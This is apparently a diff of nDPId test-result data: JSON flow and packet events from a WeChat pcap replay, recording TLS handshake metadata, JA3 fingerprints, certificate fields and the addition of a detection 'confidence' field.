-00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167453010,"flow_last_seen":1492167454373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167454373,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00893{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167452759,"flow_last_seen":1492167453494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167453494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01427{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":502,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167452759,"flow_last_seen":1492167453503,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"ts_msec":1492167453503,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
+00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167453010,"flow_last_seen":1492167454373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167454373,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":515,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167454457,"flow_last_seen":1492167454457,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167454457,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1492167454457,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167454457,"pkt":"8IQvSpdgeJKcD6iOCABFAAA86XpAAEAGK8LAqAFny82XotNVAbue7PR+AAAAAKACchAqvwAAAgQFtAQCCAoAMR0EAAAAAAEDAwc="}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":516,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167454458,"flow_last_seen":1492167454458,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167454458,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1492167454458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167454458,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8cSZAAEAGpBbAqAFny82XotNWAbsdO2wiAAAAAKACchA0zAAAAgQFtAQCCAoAMR0EAAAAAAEDAwc="}
-00867{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":521,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167453010,"flow_last_seen":1492167454734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"ts_msec":1492167454734,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":523,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167453010,"flow_last_seen":1492167454734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"ts_msec":1492167454734,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
+00893{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":521,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167453010,"flow_last_seen":1492167454734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"ts_msec":1492167454734,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01428{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":523,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167453010,"flow_last_seen":1492167454734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"ts_msec":1492167454734,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1492167454801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167454801,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG701bGHEoeHTtsI6ASN8gRwgAAAgQFoAQCCApF0gdIADEdBAEDAwc="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":531,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1492167454802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167454802,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0cSdAAEAGpB3AqAFny82XotNWAbsdO2wjxhxKH4AQAOV3BwAAAQEICgAxHVpF0gdI"}
-00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454458,"flow_last_seen":1492167454802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167454802,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454458,"flow_last_seen":1492167454802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167454802,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":536,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167454818,"flow_last_seen":1492167454818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167454818,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1492167454818,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167454818,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8NuJAAEAG3lrAqAFny82XotNXAbvn9Cu8AAAAAKACchCqHQAAAgQFtAQCCAoAMR1eAAAAAAEDAwc="}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1492167454836,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167454836,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC4GJp3LzZeiwKgBZwG701XgAvN\/nuz0f6ASN8ip9gAAAgQFoAQCCApFraHjADEdBAEDAwc="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1492167454836,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167454836,"pkt":"8IQvSpdgeJKcD6iOCABFAAA06XtAAEAGK8nAqAFny82XotNVAbue7PR\/4ALzgIAQAOUPMwAAAQEICgAxHWNFraHj"}
-00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454457,"flow_last_seen":1492167454837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167454837,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":544,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454458,"flow_last_seen":1492167455179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":559,"midstream":0,"ts_msec":1492167455179,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
+00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454457,"flow_last_seen":1492167454837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167454837,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+01427{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":544,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454458,"flow_last_seen":1492167455179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":559,"midstream":0,"ts_msec":1492167455179,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1492167455179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167455179,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG701d\/O17O5\/QrvaASN8geewAAAgQFoAQCCApFraI2ADEdXgEDAwc="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1492167455179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167455179,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0NuNAAEAG3mHAqAFny82XotNXAbvn9Cu9fztez4AQAOWDvAAAAQEICgAxHbhFraI2"}
-00810{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":550,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454818,"flow_last_seen":1492167455180,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167455180,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00867{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":558,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454457,"flow_last_seen":1492167455193,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167455193,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":560,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167454457,"flow_last_seen":1492167455196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"ts_msec":1492167455196,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
-00867{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":567,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454818,"flow_last_seen":1492167455501,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167455501,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":569,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167454818,"flow_last_seen":1492167455502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"ts_msec":1492167455502,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
